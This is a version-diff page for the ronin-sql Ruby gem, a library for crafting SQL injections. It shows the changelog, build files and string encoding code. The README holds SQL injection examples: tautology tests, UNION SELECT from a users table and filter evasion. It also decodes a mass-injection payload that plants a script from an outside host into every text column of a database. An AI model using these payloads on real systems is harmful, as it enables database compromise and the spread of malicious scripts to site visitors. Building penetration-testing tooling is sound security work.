RubyGems - ronin-sql - Versions diffs - 0.2.4 → 1.0.0 - Mend

ronin-sql 0.2.4 → 1.0.0

Files changed (154) hide show

data/.document +4 -0
data/.gitignore +11 -0
data/.rspec +1 -0
data/.yardopts +1 -0
data/COPYING.txt +623 -288
data/{History.txt → ChangeLog.md} +33 -35
data/Gemfile +25 -0
data/README.md +110 -0
data/Rakefile +30 -20
data/bin/ronin-sql +18 -5
data/gemspec.yml +16 -0
data/lib/ronin/formatting/extensions/sql.rb +4 -3
data/lib/ronin/formatting/extensions/sql/string.rb +83 -10
data/lib/ronin/formatting/sql.rb +4 -3
data/lib/ronin/sql.rb +5 -12
data/lib/ronin/{code/sql/create_index.rb → sql/binary_expr.rb} +25 -18
data/lib/ronin/sql/clause.rb +72 -0
data/lib/ronin/sql/clauses.rb +297 -0
data/lib/ronin/sql/emittable.rb +84 -0
data/lib/ronin/sql/emitter.rb +375 -0
data/lib/ronin/sql/field.rb +106 -0
data/lib/ronin/{code/sql/as.rb → sql/fields.rb} +36 -17
data/lib/ronin/{code/sql/binary_expr.rb → sql/function.rb} +27 -27
data/lib/ronin/sql/functions.rb +989 -0
data/lib/ronin/sql/injection.rb +125 -157
data/lib/ronin/{code/sql/default_values_clause.rb → sql/literal.rb} +13 -11
data/lib/ronin/sql/literals.rb +72 -0
data/lib/ronin/sql/operators.rb +332 -0
data/lib/ronin/sql/sql.rb +86 -0
data/lib/ronin/sql/statement.rb +70 -0
data/lib/ronin/sql/statement_list.rb +110 -0
data/lib/ronin/sql/statements.rb +115 -0
data/lib/ronin/{code/sql/desc.rb → sql/unary_expr.rb} +11 -11
data/lib/ronin/sql/version.rb +5 -4
data/ronin-sql.gemspec +61 -0
data/spec/formatting/sql/string_spec.rb +172 -0
data/spec/spec_helper.rb +1 -4
data/spec/sql/binary_expr.rb +5 -0
data/spec/sql/binary_expr_examples.rb +25 -0
data/spec/sql/clause_examples.rb +43 -0
data/spec/sql/clause_spec.rb +31 -0
data/spec/sql/clauses_spec.rb +43 -0
data/spec/sql/emittable_spec.rb +41 -0
data/spec/sql/emitter_spec.rb +472 -0
data/spec/sql/field_spec.rb +103 -0
data/spec/sql/fields_spec.rb +40 -0
data/spec/sql/function_examples.rb +30 -0
data/spec/sql/function_spec.rb +25 -0
data/spec/sql/functions_spec.rb +110 -0
data/spec/sql/injection_spec.rb +233 -0
data/spec/sql/literal_spec.rb +5 -0
data/spec/sql/literals_spec.rb +46 -0
data/spec/sql/operators_spec.rb +44 -0
data/spec/sql/sql_spec.rb +18 -0
data/spec/sql/statement_examples.rb +39 -0
data/spec/sql/statement_list_spec.rb +48 -0
data/spec/sql/statement_sql.rb +38 -0
data/spec/sql/statements_spec.rb +22 -0
data/spec/sql/unary_expr.rb +5 -0
data/spec/sql/unary_expr_examples.rb +20 -0
metadata +116 -217
data.tar.gz.sig +0 -0
data/Manifest.txt +0 -108
data/README.txt +0 -112
data/lib/ronin/code/sql.rb +0 -22
data/lib/ronin/code/sql/add_column_clause.rb +0 -42
data/lib/ronin/code/sql/alter_table.rb +0 -52
data/lib/ronin/code/sql/asc.rb +0 -36
data/lib/ronin/code/sql/between.rb +0 -66
data/lib/ronin/code/sql/clause.rb +0 -35
data/lib/ronin/code/sql/code.rb +0 -35
data/lib/ronin/code/sql/common_dialect.rb +0 -66
data/lib/ronin/code/sql/create.rb +0 -74
data/lib/ronin/code/sql/create_table.rb +0 -44
data/lib/ronin/code/sql/create_view.rb +0 -41
data/lib/ronin/code/sql/delete.rb +0 -52
data/lib/ronin/code/sql/dialect.rb +0 -282
data/lib/ronin/code/sql/drop.rb +0 -55
data/lib/ronin/code/sql/drop_index.rb +0 -41
data/lib/ronin/code/sql/drop_table.rb +0 -41
data/lib/ronin/code/sql/drop_view.rb +0 -41
data/lib/ronin/code/sql/emittable.rb +0 -100
data/lib/ronin/code/sql/exceptions.rb +0 -24
data/lib/ronin/code/sql/exceptions/unknown_clause.rb +0 -29
data/lib/ronin/code/sql/exceptions/unknown_dialect.rb +0 -29
data/lib/ronin/code/sql/exceptions/unknown_statement.rb +0 -29
data/lib/ronin/code/sql/expr.rb +0 -102
data/lib/ronin/code/sql/field.rb +0 -101
data/lib/ronin/code/sql/fields_clause.rb +0 -46
data/lib/ronin/code/sql/from_clause.rb +0 -42
data/lib/ronin/code/sql/function.rb +0 -53
data/lib/ronin/code/sql/group_by_clause.rb +0 -46
data/lib/ronin/code/sql/having_clause.rb +0 -46
data/lib/ronin/code/sql/in.rb +0 -47
data/lib/ronin/code/sql/injected_statement.rb +0 -100
data/lib/ronin/code/sql/injection.rb +0 -203
data/lib/ronin/code/sql/insert.rb +0 -54
data/lib/ronin/code/sql/intersect_clause.rb +0 -42
data/lib/ronin/code/sql/join_clause.rb +0 -123
data/lib/ronin/code/sql/like.rb +0 -73
data/lib/ronin/code/sql/limit_clause.rb +0 -42
data/lib/ronin/code/sql/modifier.rb +0 -48
data/lib/ronin/code/sql/offset_clause.rb +0 -42
data/lib/ronin/code/sql/on_clause.rb +0 -55
data/lib/ronin/code/sql/order_by_clause.rb +0 -42
data/lib/ronin/code/sql/program.rb +0 -225
data/lib/ronin/code/sql/rename_to_clause.rb +0 -42
data/lib/ronin/code/sql/replace.rb +0 -54
data/lib/ronin/code/sql/select.rb +0 -103
data/lib/ronin/code/sql/set_clause.rb +0 -42
data/lib/ronin/code/sql/statement.rb +0 -180
data/lib/ronin/code/sql/token.rb +0 -62
data/lib/ronin/code/sql/unary_expr.rb +0 -47
data/lib/ronin/code/sql/union_all_clause.rb +0 -42
data/lib/ronin/code/sql/union_clause.rb +0 -42
data/lib/ronin/code/sql/update.rb +0 -52
data/lib/ronin/code/sql/values_clause.rb +0 -46
data/lib/ronin/code/sql/where_clause.rb +0 -42
data/lib/ronin/sql/error.rb +0 -26
data/lib/ronin/sql/error/error.rb +0 -62
data/lib/ronin/sql/error/extensions.rb +0 -22
data/lib/ronin/sql/error/extensions/string.rb +0 -77
data/lib/ronin/sql/error/message.rb +0 -62
data/lib/ronin/sql/error/pattern.rb +0 -104
data/lib/ronin/sql/error/patterns.rb +0 -99
data/lib/ronin/sql/extensions.rb +0 -22
data/lib/ronin/sql/extensions/uri.rb +0 -22
data/lib/ronin/sql/extensions/uri/http.rb +0 -107
data/spec/code/sql/common_dialect_spec.rb +0 -205
data/spec/code/sql/create_examples.rb +0 -19
data/spec/code/sql/create_index_spec.rb +0 -25
data/spec/code/sql/create_table_spec.rb +0 -27
data/spec/code/sql/create_view_spec.rb +0 -16
data/spec/code/sql/delete_spec.rb +0 -14
data/spec/code/sql/drop_examples.rb +0 -10
data/spec/code/sql/drop_index_spec.rb +0 -16
data/spec/code/sql/drop_table_spec.rb +0 -16
data/spec/code/sql/drop_view_spec.rb +0 -16
data/spec/code/sql/has_default_values_clause_examples.rb +0 -10
data/spec/code/sql/has_fields_clause_examples.rb +0 -15
data/spec/code/sql/has_from_clause_examples.rb +0 -13
data/spec/code/sql/has_values_clause_examples.rb +0 -15
data/spec/code/sql/has_where_clause_examples.rb +0 -15
data/spec/code/sql/insert_spec.rb +0 -21
data/spec/code/sql/replace_spec.rb +0 -21
data/spec/code/sql/select_spec.rb +0 -105
data/spec/code/sql/update_spec.rb +0 -26
data/spec/helpers/code.rb +0 -14
data/spec/sql/error_spec.rb +0 -24
data/spec/sql/extensions/uri/http_spec.rb +0 -34
data/spec/sql_spec.rb +0 -9
data/tasks/spec.rb +0 -10
data/tasks/yard.rb +0 -13
metadata.gz.sig +0 -0

data/{History.txt → ChangeLog.md} RENAMED Viewed

@@ -1,4 +1,22 @@
-=== 0.2.4 / 2009-09-24
+### 1.0.0 / 2013-01-21
+* Require [Ruby] >= 1.9.1.
+* No longer require ronin.
+* No longer require ronin-web.
+* Added {String#sql_unescape}.
+* Moved {String#sql_escape}, {String#sql_encode} and {String#sql_decode}
+  from [ronin-support].
+* Refactored the {Ronin::SQL SQL} DSL to be more like
+  [ARel](https://github.com/rails/arel#readme).
+  * Moved the DSL from `Ronin::Code::SQL` into {Ronin::SQL}.
+* Removed `Ronin::SQL::Error`.
+* Removed `String#sql_error`.
+* Removed `String#sql_error?`.
+* Removed `URI::HTTP.has_sql_errors?`.
+* Removed `URI::HTTP.sql_error`.
+* Removed `URI::HTTP.sql_errors`.
+### 0.2.4 / 2009-09-24
 * Require ronin >= 0.3.0.
 * Require ronin-web >= 0.2.0.
@@ -9,7 +27,7 @@
 * Fixed a formatting issue in the README.txt file, which was causing RDoc
   to crash.
-=== 0.2.3 / 2009-07-02
+### 0.2.3 / 2009-07-02
 * Use Hoe >= 2.0.0.
 * Require ronin >= 0.2.4.
@@ -18,18 +36,18 @@
   Ronin::SQL::Injection objects for URI::HTTP urls.
 * Added more specs.
-=== 0.2.2 / 2009-01-22
+### 0.2.2 / 2009-01-22
 * Depend on the new ronin-web library.
 * Replace Hpricot with Nokogiri.
 * Use the new Ronin::Web::Spider, instead of directly using Spidr.
 * Use the new Nokogiri extensions from ronin-web.
-=== 0.2.1 / 2009-01-09
+### 0.2.1 / 2009-01-09
 * Added missing files to the Manifest.
-=== 0.2.0 / 2009-01-08
+### 0.2.0 / 2009-01-08
 * Require Ronin >= 0.1.3.
 * Refactored Ronin::Code::SQL.
@@ -38,48 +56,28 @@
   * Support common SQL clauses.
   * Allow for injecting arbitrary SQL clauses.
   * Added more SQL Injection test generators.
-    * all_rows:
-         OR 1 = 1
-    * exact_rows:
-         AND 1 = 1
-    * no_rows:
-         AND 1 = 0
-    * has_column?(column):
-         OR column IS NOT NULL
-    * has_table?(table):
-         AND (SELECT FROM table count(*) == 1)
-    * uses_column?(column):
-         GROUP BY column HAVING 1 = 1
-    * uses_table?(table):
-         OR table IS NOT NULL
+    * all_rows: `OR 1 = 1`
+    * exact_rows: `AND 1 = 1`
+    * no_rows: `AND 1 = 0`
+    * has_column?(column): `OR column IS NOT NULL`
+    * has_table?(table): `AND (SELECT FROM table count(*) == 1)`
+    * uses_column?(column): `GROUP BY column HAVING 1 = 1`
+    * uses_table?(table): `OR table IS NOT NULL`
 * Removed references to Ronin::Vulnerable.
 * Added more specs:
   * Specs for most of Ronin::Code::SQL.
   * Specs on Ronin::SQL::Error and the SQL encoding/decoding extensions for
     the String class.
-=== 0.1.1 / 2008-09-28
+### 0.1.1 / 2008-09-28
 * Trivial bug fix to URI::HTTP#sql_errors.
-=== 0.1.0 / 2007-12-23
+### 0.1.0 / 2007-12-23
 * Initial release.
 * Supports SQL code generation.
 * Supports obfustication of SQL code.
 * Supports SQL Injection code generation.
+[Ruby]: http://www.ruby-lang.org/

data/Gemfile ADDED Viewed

@@ -0,0 +1,25 @@
+source 'https://rubygems.org'
+RONIN_URI  = 'http://github.com/ronin-ruby'
+gemspec
+gem 'jruby-openssl',	'~> 0.7', :platforms => :jruby
+# Ronin dependencies:
+# gem 'ronin-support',  '~> 0.6',   :git => "#{RONIN_URI}/ronin-support.git"
+# gem 'ronin',          '~> 1.5.0', :git => "#{RONIN_URI}/ronin.git"
+group :development do
+  gem 'rake',         '~> 10.0'
+  gem 'kramdown',     '~> 0.12'
+  gem 'ripl',              '~> 0.3'
+  gem 'ripl-multi_line',   '~> 0.2'
+  gem 'ripl-auto_indent',  '~> 0.1'
+  gem 'ripl-short_errors', '~> 0.1'
+  gem 'ripl-color_result', '~> 0.3'
+  gem 'rubygems-tasks', '~> 0.1'
+  gem 'rspec',          '~> 2.4'
+end

data/README.md ADDED Viewed

@@ -0,0 +1,110 @@
+# Ronin SQL
+* [Source](https://github.com/ronin-ruby/ronin-sql)
+* [Issues](https://github.com/ronin-ruby/ronin-sql/issues)
+* [Documentation](http://rubydoc.info/github/ronin-ruby/ronin-sql/frames)
+* [Mailing List](https://groups.google.com/group/ronin-ruby)
+* [irc.freenode.net #ronin](http://webchat.freenode.net/?channels=ronin&uio=Mj10cnVldd)
+## Description
+{Ronin::SQL} is a Ruby DSL for crafting SQL Injections (SQLi).
+### Features
+* Provides convenience methods for encoding/decoding SQL data.
+* Provides an Domain Specific Language (DSL) for crafting normal SQL and
+  SQL injections.
+## Examples
+### Convenience Methods
+Escape a String:
+    "O'Brian".sql_escape
+    # => "'O''Brian'"
+Unescapes a SQL String:
+    "'O''Brian'".sql_unescape
+    # => "O'Briand"
+Hex encode a String:
+    "exploit".sql_encode
+    # => "0x6578706c6f6974"
+Hex decode a String:
+    string = "4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72"
+    string.sql_decode
+    # => "DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''\"></title><script src=\"http://www0.douhunqn.cn/csrss/w.js\"></script><!--''+['+@C+'] where '+@C+' not like ''%\"></title><script src=\"http://www0.douhunqn.cn/csrss/w.js\"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
+### SQLi DSL
+Injecting a `1=1` test into a String value:
+    sqli = Ronin::SQL::Injection.new(:escape => :string)
+    sqli.or { string(1) == string(1) }
+    puts sqli
+    # 1' OR '1'='1
+Columns:
+    sqli = Ronin::SQL::Injection.new
+    sqli.and { admin == 1 }
+    puts sqli
+    # 1 AND admin=1
+Clauses:
+    sqli = Ronin::SQL::Injection.new
+    sqli.or { 1 == 1 }.limit(0)
+    puts sqli
+    # 1 AND admin=1
+Statements:
+    sqli = Ronin::SQL::Injection.new
+    sqli.union { select(1,2,3,4,id).from(users) }
+    puts sqli
+    # 1 UNION SELECT (1,2,3,4,id) FROM users
+Filter evasion:
+    sqli = Ronin::SQL::Injection.new
+    sqli.union { select(1,2,3,4,id).from(users) }
+    puts sqli.to_sql(:space => '/**/')
+    # 1/**/UNION/**/SELECT/**/(1,2,3,4,id)/**/FROM/**/users
+## Requirements
+* [Ruby] >= 1.9.1
+## Install
+    $ gem install ronin-sql
+## License
+Ronin SQL - A Ruby DSL for crafting SQL Injections.
+Copyright (c) 2007-2013 Hal Brodigan (postmodern.mod3 at gmail.com)
+This file is part of Ronin SQL.
+Ronin Asm is free software: you can redistribute it and/or modify
+it under the terms of the GNU General Public License as published by
+the Free Software Foundation, either version 3 of the License, or
+(at your option) any later version.
+Ronin Asm is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+GNU General Public License for more details.
+You should have received a copy of the GNU General Public License
+along with Ronin Asm.  If not, see <http://www.gnu.org/licenses/>.
+[Ruby]: http://www.ruby-lang.org

data/Rakefile CHANGED Viewed

@@ -1,26 +1,36 @@
-# -*- ruby -*-
 require 'rubygems'
-require 'hoe'
-require 'hoe/signing'
-require './tasks/spec.rb'
-require './tasks/yard.rb'
-Hoe.spec('ronin-sql') do
-  self.rubyforge_name = 'ronin'
-  self.developer('Postmodern','postmodern.mod3@gmail.com')
-  self.remote_rdoc_dir = 'docs/ronin-sql'
-  self.extra_deps = [
-    ['ronin', '>=0.3.0'],
-    ['ronin-web', '>=0.2.0']
-  ]
+begin
+  require 'bundler'
+rescue LoadError => e
+  warn e.message
+  warn "Run `gem install bundler` to install Bundler."
+  exit e.status_code
+end
-  self.extra_dev_deps = [
-    ['rspec', '>=1.2.8'],
-    ['yard', '>=0.2.3.5']
-  ]
+begin
+  Bundler.setup(:development)
+rescue Bundler::BundlerError => e
+  warn e.message
+  warn "Run `bundle install` to install missing gems"
+  exit e.status_code
+end
+require 'rake'
-  self.spec_extras = {:has_rdoc => 'yard'}
+require 'rubygems/tasks'
+Gem::Tasks.new(:sign => {:checksum => true, :pgp => true}) do |tasks|
+  tasks.console.command = 'ripl'
+  tasks.console.options = %w[
+    -rripl/multi_line
+    -rripl/auto_indent
+    -rripl/color_result
+  ]
 end
-# vim: syntax=Ruby
+require 'rspec/core/rake_task'
+RSpec::Core::RakeTask.new
+task :default => :spec
+require 'yard'
+YARD::Rake::YardocTask.new

data/bin/ronin-sql CHANGED Viewed

@@ -2,13 +2,26 @@
 require 'rubygems'
-lib_dir = File.expand_path(File.join(File.dirname(__FILE__),'..','lib'))
-unless $LOAD_PATH.include?(lib_dir)
-  $LOAD_PATH << lib_dir
+root_dir = File.expand_path(File.join(File.dirname(__FILE__),'..'))
+if File.directory?(File.join(root_dir,'.git'))
+  Dir.chdir(root_dir) do |path|
+    require 'bundler'
+    begin
+      Bundler.setup(:default)
+    rescue Bundler::BundlerError => e
+      STDERR.puts e.message
+      STDERR.puts "Run `bundle install` to install missing gems"
+      exit e.status_code
+    end
+  end
 end
-require 'ronin/ui/command_line/commands/console'
+lib_dir = File.join(root_dir,'lib')
+$LOAD_PATH << lib_dir unless $LOAD_PATH.include?(lib_dir)
 require 'ronin/ui/console'
+require 'ronin/ui/command_line/commands/console'
 Ronin::UI::Console.auto_load << 'ronin/sql'
-Ronin::UI::CommandLine::Commands::Console.start
+Ronin::UI::CLI::Commands::Console.start

data/gemspec.yml ADDED Viewed

@@ -0,0 +1,16 @@
+name: ronin-sql
+summary: A Ruby DSL for crafting SQL Injections.
+description:
+  Ronin SQL is a a Ruby DSL for crafting SQL Injections.
+license: GPL-3
+authors: Postmodern
+email: postmodern.mod3@gmail.com
+homepage: https://github.com/ronin-ruby/ronin-sql
+has_yard: true
+required_ruby_version: ">= 1.9.1"
+development_dependencies:
+  bundler: ~> 1.0
+  yard: ~> 0.8

data/lib/ronin/formatting/extensions/sql.rb CHANGED Viewed

@@ -1,8 +1,9 @@
 #
-# Ronin SQL - A Ronin library providing support for SQL related security
-# tasks.
+# Ronin SQL - A Ruby DSL for crafting SQL Injections.
 #
-# Copyright (c) 2007-2009 Hal Brodigan (postmodern.mod3 at gmail.com)
+# Copyright (c) 2007-2013 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This file is part of Ronin SQL.
 #
 # This program is free software; you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by

data/lib/ronin/formatting/extensions/sql/string.rb CHANGED Viewed

@@ -1,8 +1,9 @@
 #
-# Ronin SQL - A Ronin library providing support for SQL related security
-# tasks.
+# Ronin SQL - A Ruby DSL for crafting SQL Injections.
 #
-# Copyright (c) 2007-2009 Hal Brodigan (postmodern.mod3 at gmail.com)
+# Copyright (c) 2007-2013 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This file is part of Ronin SQL.
 #
 # This program is free software; you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
@@ -21,12 +22,77 @@
 class String
+  #
+  # Escapes an String for SQL.
+  #
+  # @param [:single, :double, :tick] quotes (:single)
+  #   Specifies whether to create a single or double quoted string.
+  #
+  # @return [String]
+  #   The escaped String.
+  #
+  # @raise [TypeError]
+  #   The quotes argument was neither `:single`, `:double` nor `:tick`.
+  #
+  # @example
+  #   "O'Brian".sql_escape
+  #   # => "'O''Brian'"
+  #
+  # @example Encode with double-quotes:
+  #   "O'Brian".sql_escape(:double)
+  #   # => "\"O'Brian\""
+  #
+  # @api public
+  #
+  def sql_escape(quotes=:single)
+    char = case quotes
+           when :single then "'"
+           when :double then '"'
+           when :tick   then '`'
+           else
+             raise(ArgumentError,"invalid quoting style #{quotes.inspect}")
+           end
+    return char + gsub(char,char * 2) + char
+  end
+  #
+  # Unescapes a SQL String.
+  #
+  # @return [String]
+  #   The unescaped String.
+  #
+  # @raise
+  #   The String was not quoted with single, double or tick-mark quotes.
+  #
+  # @example
+  #   "'O''Brian'".sql_unescape
+  #   # => "O'Brian"
+  #
+  # @api public
+  #
+  # @since 1.0.0
+  #
+  def sql_unescape
+    char = if    (self[0] == "'" && self[-1] == "'") then "'"
+           elsif (self[0] == '"' && self[-1] == '"') then '"'
+           elsif (self[0] == '`' && self[-1] == '`') then '`'
+           else
+             raise(TypeError,"#{self.inspect} is not properly quoted")
+           end
+    return self[1..-2].gsub(char * 2,char)
+  end
   #
   # Returns the SQL hex-string encoded form of the String.
   #
+  # @example
   #   "/etc/passwd".sql_encode
   #   # => "0x2f6574632f706173737764"
   #
+  # @api public
+  #
   def sql_encode
     return '' if empty?
@@ -42,25 +108,32 @@ class String
   #
   # Returns the SQL decoded form of the String.
   #
+  # @example
   #   "'Conan O''Brian'".sql_decode
   #   # => "Conan O'Brian"
   #
-  #  "0x2f6574632f706173737764".sql_decode
+  # @example
+  #  "2f6574632f706173737764".sql_decode
   #  # => "/etc/passwd"
   #
+  # @raise
+  #   The String is neither hex encoded or SQL escaped.
+  #
+  # @see #sql_unescape
+  #
+  # @api public
+  #
   def sql_decode
-    if ((self[0...2] == '0x') && (length % 2 == 0))
+    if (self =~ /^[0-9a-fA-F]{2,}$/ && (length % 2 == 0))
       raw = ''
-      self[2..-1].scan(/[0-9a-fA-F]{2}/).each do |hex_char|
-        raw << hex_char.hex.chr
+      scan(/../) do |hex_char|
+        raw << hex_char.to_i(16)
       end
       return raw
-    elsif (self[0..0] == "'" && self[-1..-1] == "'")
-      self[1..-2].gsub(/\\'/,"'").gsub(/''/,"'")
     else
-      return self
+      sql_unescape
     end
   end